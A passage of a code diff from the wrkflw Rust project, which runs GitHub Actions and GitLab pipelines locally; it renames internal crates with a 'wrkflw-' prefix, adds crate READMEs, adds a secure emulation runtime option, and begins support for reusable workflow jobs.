let result = wrkflw_evaluator::evaluate_workflow_file(
    Path::new(".github/workflows/ci.yml"),
    /* verbose */ true,
).expect("evaluation failed");
if result.is_valid {
    println!("Workflow looks structurally sound");
} else {
    for issue in result.issues {
        println!("- {}", issue);
    }
}
```
### Notes
- This crate focuses on structural checks; deeper rules live in `wrkflw-validators`.
- Most consumers should prefer the top-level `wrkflw` CLI for end-to-end UX.


@@ -3,8 +3,8 @@ use serde_yaml::{self, Value};
use std::fs;
use std::path::Path;
use models::ValidationResult;
use validators::{validate_jobs, validate_triggers};
use wrkflw_models::ValidationResult;
use wrkflw_validators::{validate_jobs, validate_triggers};
pub fn evaluate_workflow_file(path: &Path, verbose: bool) -> Result<ValidationResult, String> {
let content = fs::read_to_string(path).map_err(|e| format!("Failed to read file: {}", e))?;


@@ -1,18 +1,23 @@
[package]
name = "executor"
name = "wrkflw-executor"
version.workspace = true
edition.workspace = true
description = "Workflow executor for wrkflw"
description = "Workflow execution engine for wrkflw"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
parser = { path = "../parser" }
runtime = { path = "../runtime" }
logging = { path = "../logging" }
matrix = { path = "../matrix" }
utils = { path = "../utils" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-parser = { path = "../parser", version = "0.7.0" }
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
# External dependencies
async-trait.workspace = true

crates/executor/README.md Normal file

@@ -0,0 +1,29 @@
## wrkflw-executor
The execution engine that runs GitHub Actions workflows locally (Docker, Podman, or emulation).
- **Features**:
- Job graph execution with `needs` ordering and parallelism
- Docker/Podman container steps and emulation mode
- Basic environment/context wiring compatible with Actions
- **Used by**: `wrkflw` CLI and TUI
### API sketch
```rust
use wrkflw_executor::{execute_workflow, ExecutionConfig, RuntimeType};
let cfg = ExecutionConfig {
    runtime: RuntimeType::Docker,
    verbose: true,
    preserve_containers_on_failure: false,
};
// Path to a workflow YAML
let workflow_path = std::path::Path::new(".github/workflows/ci.yml");
let result = execute_workflow(workflow_path, cfg).await?;
println!("workflow status: {:?}", result.summary_status);
```
Prefer using the `wrkflw` binary for a complete UX across validation, execution, and logs.


@@ -1,5 +1,5 @@
use parser::workflow::WorkflowDefinition;
use std::collections::{HashMap, HashSet};
use wrkflw_parser::workflow::WorkflowDefinition;
pub fn resolve_dependencies(workflow: &WorkflowDefinition) -> Result<Vec<Vec<String>>, String> {
let jobs = &workflow.jobs;


@@ -6,14 +6,14 @@ use bollard::{
Docker,
};
use futures_util::StreamExt;
use logging;
use once_cell::sync::Lazy;
use runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use std::collections::HashMap;
use std::path::Path;
use std::sync::Mutex;
use utils;
use utils::fd;
use wrkflw_logging;
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use wrkflw_utils;
use wrkflw_utils::fd;
static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
static CREATED_NETWORKS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
@@ -50,7 +50,7 @@ impl DockerRuntime {
match CUSTOMIZED_IMAGES.lock() {
Ok(images) => images.get(&key).cloned(),
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
None
}
}
@@ -62,7 +62,7 @@ impl DockerRuntime {
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
images.insert(key, new_image.to_string());
}) {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
}
}
@@ -72,7 +72,7 @@ impl DockerRuntime {
let image_keys = match CUSTOMIZED_IMAGES.lock() {
Ok(keys) => keys,
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
return None;
}
};
@@ -107,7 +107,7 @@ impl DockerRuntime {
match CUSTOMIZED_IMAGES.lock() {
Ok(images) => images.get(&key).cloned(),
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
None
}
}
@@ -134,7 +134,7 @@ impl DockerRuntime {
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
images.insert(key, new_image.to_string());
}) {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
}
}
@@ -318,7 +318,7 @@ pub fn is_available() -> bool {
}
}
Err(_) => {
logging::debug("Docker CLI is not available");
wrkflw_logging::debug("Docker CLI is not available");
return false;
}
}
@@ -331,7 +331,7 @@ pub fn is_available() -> bool {
{
Ok(rt) => rt,
Err(e) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Failed to create runtime for Docker availability check: {}",
e
));
@@ -352,17 +352,25 @@ pub fn is_available() -> bool {
{
Ok(Ok(_)) => true,
Ok(Err(e)) => {
logging::debug(&format!("Docker daemon ping failed: {}", e));
wrkflw_logging::debug(&format!(
"Docker daemon ping failed: {}",
e
));
false
}
Err(_) => {
logging::debug("Docker daemon ping timed out after 1 second");
wrkflw_logging::debug(
"Docker daemon ping timed out after 1 second",
);
false
}
}
}
Err(e) => {
logging::debug(&format!("Docker daemon connection failed: {}", e));
wrkflw_logging::debug(&format!(
"Docker daemon connection failed: {}",
e
));
false
}
}
@@ -371,7 +379,7 @@ pub fn is_available() -> bool {
{
Ok(result) => result,
Err(_) => {
logging::debug("Docker availability check timed out");
wrkflw_logging::debug("Docker availability check timed out");
false
}
}
@@ -379,7 +387,9 @@ pub fn is_available() -> bool {
}) {
Ok(result) => result,
Err(_) => {
logging::debug("Failed to redirect stderr when checking Docker availability");
wrkflw_logging::debug(
"Failed to redirect stderr when checking Docker availability",
);
false
}
}
@@ -393,7 +403,7 @@ pub fn is_available() -> bool {
return match handle.join() {
Ok(result) => result,
Err(_) => {
logging::warning("Docker availability check thread panicked");
wrkflw_logging::warning("Docker availability check thread panicked");
false
}
};
@@ -401,7 +411,9 @@ pub fn is_available() -> bool {
std::thread::sleep(std::time::Duration::from_millis(50));
}
logging::warning("Docker availability check timed out, assuming Docker is not available");
wrkflw_logging::warning(
"Docker availability check timed out, assuming Docker is not available",
);
false
}
@@ -444,19 +456,19 @@ pub async fn cleanup_resources(docker: &Docker) {
tokio::join!(cleanup_containers(docker), cleanup_networks(docker));
if let Err(e) = container_result {
logging::error(&format!("Error during container cleanup: {}", e));
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
}
if let Err(e) = network_result {
logging::error(&format!("Error during network cleanup: {}", e));
wrkflw_logging::error(&format!("Error during network cleanup: {}", e));
}
})
.await
{
Ok(_) => logging::debug("Docker cleanup completed within timeout"),
Err(_) => {
logging::warning("Docker cleanup timed out, some resources may not have been removed")
}
Ok(_) => wrkflw_logging::debug("Docker cleanup completed within timeout"),
Err(_) => wrkflw_logging::warning(
"Docker cleanup timed out, some resources may not have been removed",
),
}
}
@@ -468,7 +480,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
match RUNNING_CONTAINERS.try_lock() {
Ok(containers) => containers.clone(),
Err(_) => {
logging::error("Could not acquire container lock for cleanup");
wrkflw_logging::error("Could not acquire container lock for cleanup");
vec![]
}
}
@@ -477,7 +489,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
{
Ok(containers) => containers,
Err(_) => {
logging::error("Timeout while trying to get containers for cleanup");
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
vec![]
}
};
@@ -486,7 +498,7 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
return Ok(());
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"Cleaning up {} containers",
containers_to_cleanup.len()
));
@@ -500,11 +512,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
)
.await
{
Ok(Ok(_)) => logging::debug(&format!("Stopped container: {}", container_id)),
Ok(Err(e)) => {
logging::warning(&format!("Error stopping container {}: {}", container_id, e))
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Stopped container: {}", container_id)),
Ok(Err(e)) => wrkflw_logging::warning(&format!(
"Error stopping container {}: {}",
container_id, e
)),
Err(_) => {
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
}
Err(_) => logging::warning(&format!("Timeout stopping container: {}", container_id)),
}
// Then try to remove it
@@ -514,11 +529,14 @@ pub async fn cleanup_containers(docker: &Docker) -> Result<(), String> {
)
.await
{
Ok(Ok(_)) => logging::debug(&format!("Removed container: {}", container_id)),
Ok(Err(e)) => {
logging::warning(&format!("Error removing container {}: {}", container_id, e))
Ok(Ok(_)) => wrkflw_logging::debug(&format!("Removed container: {}", container_id)),
Ok(Err(e)) => wrkflw_logging::warning(&format!(
"Error removing container {}: {}",
container_id, e
)),
Err(_) => {
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
}
Err(_) => logging::warning(&format!("Timeout removing container: {}", container_id)),
}
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
@@ -536,7 +554,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
match CREATED_NETWORKS.try_lock() {
Ok(networks) => networks.clone(),
Err(_) => {
logging::error("Could not acquire network lock for cleanup");
wrkflw_logging::error("Could not acquire network lock for cleanup");
vec![]
}
}
@@ -545,7 +563,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
{
Ok(networks) => networks,
Err(_) => {
logging::error("Timeout while trying to get networks for cleanup");
wrkflw_logging::error("Timeout while trying to get networks for cleanup");
vec![]
}
};
@@ -554,7 +572,7 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
return Ok(());
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"Cleaning up {} networks",
networks_to_cleanup.len()
));
@@ -566,9 +584,13 @@ pub async fn cleanup_networks(docker: &Docker) -> Result<(), String> {
)
.await
{
Ok(Ok(_)) => logging::info(&format!("Successfully removed network: {}", network_id)),
Ok(Err(e)) => logging::error(&format!("Error removing network {}: {}", network_id, e)),
Err(_) => logging::warning(&format!("Timeout removing network: {}", network_id)),
Ok(Ok(_)) => {
wrkflw_logging::info(&format!("Successfully removed network: {}", network_id))
}
Ok(Err(e)) => {
wrkflw_logging::error(&format!("Error removing network {}: {}", network_id, e))
}
Err(_) => wrkflw_logging::warning(&format!("Timeout removing network: {}", network_id)),
}
// Always untrack the network whether or not we succeeded
@@ -599,7 +621,7 @@ pub async fn create_job_network(docker: &Docker) -> Result<String, ContainerErro
})?;
track_network(&network_id);
logging::info(&format!("Created Docker network: {}", network_id));
wrkflw_logging::info(&format!("Created Docker network: {}", network_id));
Ok(network_id)
}
@@ -615,7 +637,7 @@ impl ContainerRuntime for DockerRuntime {
volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
// Print detailed debugging info
logging::info(&format!("Docker: Running container with image: {}", image));
wrkflw_logging::info(&format!("Docker: Running container with image: {}", image));
// Add a global timeout for all Docker operations to prevent freezing
let timeout_duration = std::time::Duration::from_secs(360); // Increased outer timeout to 6 minutes
@@ -629,7 +651,7 @@ impl ContainerRuntime for DockerRuntime {
{
Ok(result) => result,
Err(_) => {
logging::error("Docker operation timed out after 360 seconds");
wrkflw_logging::error("Docker operation timed out after 360 seconds");
Err(ContainerError::ContainerExecution(
"Operation timed out".to_string(),
))
@@ -644,7 +666,7 @@ impl ContainerRuntime for DockerRuntime {
match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
Ok(result) => result,
Err(_) => {
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Pull of image {} timed out, continuing with existing image",
image
));
@@ -662,7 +684,7 @@ impl ContainerRuntime for DockerRuntime {
{
Ok(result) => result,
Err(_) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Building image {} timed out after 120 seconds",
tag
));
@@ -836,9 +858,9 @@ impl DockerRuntime {
// Convert command vector to Vec<String>
let cmd_vec: Vec<String> = cmd.iter().map(|&s| s.to_string()).collect();
logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
logging::debug(&format!("Environment: {:?}", env));
logging::debug(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::debug(&format!("Running command in Docker: {:?}", cmd_vec));
wrkflw_logging::debug(&format!("Environment: {:?}", env));
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
// Determine platform-specific configurations
let is_windows_image = image.contains("windows")
@@ -973,7 +995,7 @@ impl DockerRuntime {
_ => -1,
},
Err(_) => {
logging::warning("Container wait operation timed out, treating as failure");
wrkflw_logging::warning("Container wait operation timed out, treating as failure");
-1
}
};
@@ -1003,7 +1025,7 @@ impl DockerRuntime {
}
}
} else {
logging::warning("Retrieving container logs timed out");
wrkflw_logging::warning("Retrieving container logs timed out");
}
// Clean up container with a timeout, but preserve on failure if configured
@@ -1016,7 +1038,7 @@ impl DockerRuntime {
untrack_container(&container.id);
} else {
// Container failed and we want to preserve it for debugging
logging::info(&format!(
wrkflw_logging::info(&format!(
"Preserving container {} for debugging (exit code: {}). Use 'docker exec -it {} bash' to inspect.",
container.id, exit_code, container.id
));
@@ -1026,13 +1048,13 @@ impl DockerRuntime {
// Log detailed information about the command execution for debugging
if exit_code != 0 {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Docker command failed with exit code: {}",
exit_code
));
logging::debug(&format!("Failed command: {:?}", cmd));
logging::debug(&format!("Working directory: {}", working_dir.display()));
logging::debug(&format!("STDERR: {}", stderr));
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::debug(&format!("STDERR: {}", stderr));
}
Ok(ContainerOutput {


@@ -13,13 +13,13 @@ use crate::dependency;
use crate::docker;
use crate::environment;
use crate::podman;
use logging;
use matrix::MatrixCombination;
use models::gitlab::Pipeline;
use parser::gitlab::{self, parse_pipeline};
use parser::workflow::{self, parse_workflow, ActionInfo, Job, WorkflowDefinition};
use runtime::container::ContainerRuntime;
use runtime::emulation;
use wrkflw_logging;
use wrkflw_matrix::MatrixCombination;
use wrkflw_models::gitlab::Pipeline;
use wrkflw_parser::gitlab::{self, parse_pipeline};
use wrkflw_parser::workflow::{self, parse_workflow, ActionInfo, Job, WorkflowDefinition};
use wrkflw_runtime::container::ContainerRuntime;
use wrkflw_runtime::emulation;
#[allow(unused_variables, unused_assignments)]
/// Execute a GitHub Actions workflow file locally
@@ -27,8 +27,8 @@ pub async fn execute_workflow(
workflow_path: &Path,
config: ExecutionConfig,
) -> Result<ExecutionResult, ExecutionError> {
logging::info(&format!("Executing workflow: {}", workflow_path.display()));
logging::info(&format!("Runtime: {:?}", config.runtime_type));
wrkflw_logging::info(&format!("Executing workflow: {}", workflow_path.display()));
wrkflw_logging::info(&format!("Runtime: {:?}", config.runtime_type));
// Determine if this is a GitLab CI/CD pipeline or GitHub Actions workflow
let is_gitlab = is_gitlab_pipeline(workflow_path);
@@ -98,6 +98,7 @@ async fn execute_github_workflow(
"WRKFLW_RUNTIME_MODE".to_string(),
match config.runtime_type {
RuntimeType::Emulation => "emulation".to_string(),
RuntimeType::SecureEmulation => "secure_emulation".to_string(),
RuntimeType::Docker => "docker".to_string(),
RuntimeType::Podman => "podman".to_string(),
},
@@ -150,7 +151,7 @@ async fn execute_github_workflow(
// If there were failures, add detailed failure information to the result
if has_failures {
logging::error(&format!("Workflow execution failed:{}", failure_details));
wrkflw_logging::error(&format!("Workflow execution failed:{}", failure_details));
}
Ok(ExecutionResult {
@@ -168,7 +169,7 @@ async fn execute_gitlab_pipeline(
pipeline_path: &Path,
config: ExecutionConfig,
) -> Result<ExecutionResult, ExecutionError> {
logging::info("Executing GitLab CI/CD pipeline");
wrkflw_logging::info("Executing GitLab CI/CD pipeline");
// 1. Parse the GitLab pipeline file
let pipeline = parse_pipeline(pipeline_path)
@@ -198,6 +199,7 @@ async fn execute_gitlab_pipeline(
"WRKFLW_RUNTIME_MODE".to_string(),
match config.runtime_type {
RuntimeType::Emulation => "emulation".to_string(),
RuntimeType::SecureEmulation => "secure_emulation".to_string(),
RuntimeType::Docker => "docker".to_string(),
RuntimeType::Podman => "podman".to_string(),
},
@@ -244,7 +246,7 @@ async fn execute_gitlab_pipeline(
// If there were failures, add detailed failure information to the result
if has_failures {
logging::error(&format!("Pipeline execution failed:{}", failure_details));
wrkflw_logging::error(&format!("Pipeline execution failed:{}", failure_details));
}
Ok(ExecutionResult {
@@ -369,7 +371,7 @@ fn initialize_runtime(
match docker::DockerRuntime::new_with_config(preserve_containers_on_failure) {
Ok(docker_runtime) => Ok(Box::new(docker_runtime)),
Err(e) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Failed to initialize Docker runtime: {}, falling back to emulation mode",
e
));
@@ -377,7 +379,7 @@ fn initialize_runtime(
}
}
} else {
logging::error("Docker not available, falling back to emulation mode");
wrkflw_logging::error("Docker not available, falling back to emulation mode");
Ok(Box::new(emulation::EmulationRuntime::new()))
}
}
@@ -387,7 +389,7 @@ fn initialize_runtime(
match podman::PodmanRuntime::new_with_config(preserve_containers_on_failure) {
Ok(podman_runtime) => Ok(Box::new(podman_runtime)),
Err(e) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Failed to initialize Podman runtime: {}, falling back to emulation mode",
e
));
@@ -395,11 +397,14 @@ fn initialize_runtime(
}
}
} else {
logging::error("Podman not available, falling back to emulation mode");
wrkflw_logging::error("Podman not available, falling back to emulation mode");
Ok(Box::new(emulation::EmulationRuntime::new()))
}
}
RuntimeType::Emulation => Ok(Box::new(emulation::EmulationRuntime::new())),
RuntimeType::SecureEmulation => Ok(Box::new(
wrkflw_runtime::secure_emulation::SecureEmulationRuntime::new(),
)),
}
}
@@ -408,6 +413,7 @@ pub enum RuntimeType {
Docker,
Podman,
Emulation,
SecureEmulation,
}
#[derive(Debug, Clone)]
@@ -577,7 +583,7 @@ async fn execute_job_with_matrix(
if let Some(if_condition) = &job.if_condition {
let should_run = evaluate_job_condition(if_condition, env_context, workflow);
if !should_run {
logging::info(&format!(
wrkflw_logging::info(&format!(
"⏭️ Skipping job '{}' due to condition: {}",
job_name, if_condition
));
@@ -594,11 +600,11 @@ async fn execute_job_with_matrix(
// Check if this is a matrix job
if let Some(matrix_config) = &job.matrix {
// Expand the matrix into combinations
let combinations = matrix::expand_matrix(matrix_config)
let combinations = wrkflw_matrix::expand_matrix(matrix_config)
.map_err(|e| ExecutionError::Execution(format!("Failed to expand matrix: {}", e)))?;
if combinations.is_empty() {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Matrix job '{}' has no valid combinations",
job_name
));
@@ -606,7 +612,7 @@ async fn execute_job_with_matrix(
return Ok(Vec::new());
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"Matrix job '{}' expanded to {} combinations",
job_name,
combinations.len()
@@ -652,6 +658,12 @@ async fn execute_job(ctx: JobExecutionContext<'_>) -> Result<JobResult, Executio
ExecutionError::Execution(format!("Job '{}' not found in workflow", ctx.job_name))
})?;
// Handle reusable workflow jobs (job-level 'uses')
if let Some(uses) = &job.uses {
return execute_reusable_workflow_job(&ctx, uses, job.with.as_ref(), job.secrets.as_ref())
.await;
}
// Clone context and add job-specific variables
let mut job_env = ctx.env_context.clone();
@@ -674,17 +686,20 @@ async fn execute_job(ctx: JobExecutionContext<'_>) -> Result<JobResult, Executio
})?;
// Copy project files to the job workspace directory
logging::info(&format!(
wrkflw_logging::info(&format!(
"Copying project files to job workspace: {}",
job_dir.path().display()
));
copy_directory_contents(&current_dir, job_dir.path())?;
logging::info(&format!("Executing job: {}", ctx.job_name));
wrkflw_logging::info(&format!("Executing job: {}", ctx.job_name));
let mut job_success = true;
// Execute job steps
// Determine runner image (default if not provided)
let runner_image_value = get_runner_image_from_opt(&job.runs_on);
for (idx, step) in job.steps.iter().enumerate() {
let step_result = execute_step(StepExecutionContext {
step,
@@ -693,7 +708,7 @@ async fn execute_job(ctx: JobExecutionContext<'_>) -> Result<JobResult, Executio
working_dir: job_dir.path(),
runtime: ctx.runtime,
workflow: ctx.workflow,
runner_image: &get_runner_image(&job.runs_on),
runner_image: &runner_image_value,
verbose: ctx.verbose,
matrix_combination: &None,
})
@@ -780,7 +795,8 @@ async fn execute_matrix_combinations(
if ctx.fail_fast && any_failed {
// Add skipped results for remaining combinations
for combination in chunk {
let combination_name = matrix::format_combination_name(ctx.job_name, combination);
let combination_name =
wrkflw_matrix::format_combination_name(ctx.job_name, combination);
results.push(JobResult {
name: combination_name,
status: JobStatus::Skipped,
@@ -818,7 +834,7 @@ async fn execute_matrix_combinations(
Err(e) => {
// On error, mark as failed and continue if not fail-fast
any_failed = true;
logging::error(&format!("Matrix job failed: {}", e));
wrkflw_logging::error(&format!("Matrix job failed: {}", e));
if ctx.fail_fast {
return Err(e);
@@ -842,9 +858,9 @@ async fn execute_matrix_job(
verbose: bool,
) -> Result<JobResult, ExecutionError> {
// Create the matrix-specific job name
let matrix_job_name = matrix::format_combination_name(job_name, combination);
let matrix_job_name = wrkflw_matrix::format_combination_name(job_name, combination);
logging::info(&format!("Executing matrix job: {}", matrix_job_name));
wrkflw_logging::info(&format!("Executing matrix job: {}", matrix_job_name));
// Clone the environment and add matrix-specific values
let mut job_env = base_env_context.clone();
@@ -870,17 +886,20 @@ async fn execute_matrix_job(
})?;
// Copy project files to the job workspace directory
logging::info(&format!(
wrkflw_logging::info(&format!(
"Copying project files to job workspace: {}",
job_dir.path().display()
));
copy_directory_contents(&current_dir, job_dir.path())?;
let job_success = if job_template.steps.is_empty() {
logging::warning(&format!("Job '{}' has no steps", matrix_job_name));
wrkflw_logging::warning(&format!("Job '{}' has no steps", matrix_job_name));
true
} else {
// Execute each step
// Determine runner image (default if not provided)
let runner_image_value = get_runner_image_from_opt(&job_template.runs_on);
for (idx, step) in job_template.steps.iter().enumerate() {
match execute_step(StepExecutionContext {
step,
@@ -889,7 +908,7 @@ async fn execute_matrix_job(
working_dir: job_dir.path(),
runtime,
workflow,
runner_image: &get_runner_image(&job_template.runs_on),
runner_image: &runner_image_value,
verbose,
matrix_combination: &Some(combination.values.clone()),
})
@@ -971,7 +990,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
.unwrap_or_else(|| format!("Step {}", ctx.step_idx + 1));
if ctx.verbose {
logging::info(&format!(" Executing step: {}", step_name));
wrkflw_logging::info(&format!(" Executing step: {}", step_name));
}
// Prepare step environment
@@ -1073,7 +1092,9 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
// Special handling for Rust actions
if uses.starts_with("actions-rs/") {
logging::info("🔄 Detected Rust action - using system Rust installation");
wrkflw_logging::info(
"🔄 Detected Rust action - using system Rust installation",
);
// For toolchain action, verify Rust is installed
if uses.starts_with("actions-rs/toolchain@") {
@@ -1083,7 +1104,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
.map(|output| String::from_utf8_lossy(&output.stdout).to_string())
.unwrap_or_else(|_| "not found".to_string());
logging::info(&format!("🔄 Using system Rust: {}", rustc_version.trim()));
wrkflw_logging::info(&format!(
"🔄 Using system Rust: {}",
rustc_version.trim()
));
// Return success since we're using system Rust
return Ok(StepResult {
@@ -1101,7 +1125,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
.map(|output| String::from_utf8_lossy(&output.stdout).to_string())
.unwrap_or_else(|_| "not found".to_string());
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Using system Rust/Cargo: {}",
cargo_version.trim()
));
@@ -1109,7 +1133,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
// Get the command from the 'with' parameters
if let Some(with_params) = &ctx.step.with {
if let Some(command) = with_params.get("command") {
logging::info(&format!("🔄 Found command parameter: {}", command));
wrkflw_logging::info(&format!(
"🔄 Found command parameter: {}",
command
));
// Build the actual command
let mut real_command = format!("cargo {}", command);
@@ -1119,7 +1146,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
if !args.is_empty() {
// Resolve GitHub-style variables in args
let resolved_args = if args.contains("${{") {
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Resolving workflow variables in: {}",
args
));
@@ -1133,7 +1160,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
let re_pattern =
regex::Regex::new(r"\$\{\{\s*([^}]+)\s*\}\}")
.unwrap_or_else(|_| {
logging::error(
wrkflw_logging::error(
"Failed to create regex pattern",
);
regex::Regex::new(r"\$\{\{.*?\}\}").unwrap()
@@ -1141,7 +1168,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
let resolved =
re_pattern.replace_all(&resolved, "").to_string();
logging::info(&format!("🔄 Resolved to: {}", resolved));
wrkflw_logging::info(&format!(
"🔄 Resolved to: {}",
resolved
));
resolved.trim().to_string()
} else {
@@ -1157,7 +1187,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
}
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Running actual command: {}",
real_command
));
@@ -1239,13 +1269,13 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
.cloned()
.unwrap_or_else(|| "not set".to_string());
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"WRKFLW_HIDE_ACTION_MESSAGES value: {}",
hide_action_value
));
let hide_messages = hide_action_value == "true";
logging::debug(&format!("Should hide messages: {}", hide_messages));
wrkflw_logging::debug(&format!("Should hide messages: {}", hide_messages));
// Only log a message to the console if we're showing action messages
if !hide_messages {
@@ -1262,7 +1292,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
// Common GitHub action pattern: has a 'command' parameter
if let Some(cmd) = with_params.get("command") {
if ctx.verbose {
logging::info(&format!("🔄 Found command parameter: {}", cmd));
wrkflw_logging::info(&format!(
"🔄 Found command parameter: {}",
cmd
));
}
// Convert to real command based on action type patterns
@@ -1302,7 +1335,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
if !args.is_empty() {
// Resolve GitHub-style variables in args
let resolved_args = if args.contains("${{") {
logging::info(&format!(
wrkflw_logging::info(&format!(
"🔄 Resolving workflow variables in: {}",
args
));
@@ -1315,7 +1348,7 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
let re_pattern =
regex::Regex::new(r"\$\{\{\s*([^}]+)\s*\}\}")
.unwrap_or_else(|_| {
logging::error(
wrkflw_logging::error(
"Failed to create regex pattern",
);
regex::Regex::new(r"\$\{\{.*?\}\}").unwrap()
@@ -1323,7 +1356,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
let resolved =
re_pattern.replace_all(&resolved, "").to_string();
logging::info(&format!("🔄 Resolved to: {}", resolved));
wrkflw_logging::info(&format!(
"🔄 Resolved to: {}",
resolved
));
resolved.trim().to_string()
} else {
@@ -1342,7 +1378,10 @@ async fn execute_step(ctx: StepExecutionContext<'_>) -> Result<StepResult, Execu
if should_run_real_command && !real_command_parts.is_empty() {
// Build a final command string
let command_str = real_command_parts.join(" ");
logging::info(&format!("🔄 Running actual command: {}", command_str));
wrkflw_logging::info(&format!(
"🔄 Running actual command: {}",
command_str
));
// Replace the emulated command with a shell command to execute our command
cmd.clear();
@@ -1729,6 +1768,189 @@ fn get_runner_image(runs_on: &str) -> String {
.to_string()
}
fn get_runner_image_from_opt(runs_on: &Option<Vec<String>>) -> String {
let default = "ubuntu-latest";
let ro = runs_on
.as_ref()
.and_then(|vec| vec.first())
.map(|s| s.as_str())
.unwrap_or(default);
get_runner_image(ro)
}
async fn execute_reusable_workflow_job(
ctx: &JobExecutionContext<'_>,
uses: &str,
with: Option<&HashMap<String, String>>,
secrets: Option<&serde_yaml::Value>,
) -> Result<JobResult, ExecutionError> {
wrkflw_logging::info(&format!(
"Executing reusable workflow job '{}' -> {}",
ctx.job_name, uses
));
// Resolve the called workflow file path
enum UsesRef<'a> {
LocalPath(&'a str),
Remote {
owner: String,
repo: String,
path: String,
r#ref: String,
},
}
let uses_ref = if uses.starts_with("./") || uses.starts_with('/') {
UsesRef::LocalPath(uses)
} else {
// Expect format owner/repo/path/to/workflow.yml@ref
let parts: Vec<&str> = uses.split('@').collect();
if parts.len() != 2 {
return Err(ExecutionError::Execution(format!(
"Invalid reusable workflow reference: {}",
uses
)));
}
let left = parts[0];
let r#ref = parts[1].to_string();
let mut segs = left.splitn(3, '/');
let owner = segs.next().unwrap_or("").to_string();
let repo = segs.next().unwrap_or("").to_string();
let path = segs.next().unwrap_or("").to_string();
if owner.is_empty() || repo.is_empty() || path.is_empty() {
return Err(ExecutionError::Execution(format!(
"Invalid reusable workflow reference: {}",
uses
)));
}
UsesRef::Remote {
owner,
repo,
path,
r#ref,
}
};
// Load workflow file
let workflow_path = match uses_ref {
UsesRef::LocalPath(p) => {
// Resolve relative to current directory
let current_dir = std::env::current_dir().map_err(|e| {
ExecutionError::Execution(format!("Failed to get current dir: {}", e))
})?;
let path = current_dir.join(p);
if !path.exists() {
return Err(ExecutionError::Execution(format!(
"Reusable workflow not found at path: {}",
path.display()
)));
}
path
}
UsesRef::Remote {
owner,
repo,
path,
r#ref,
} => {
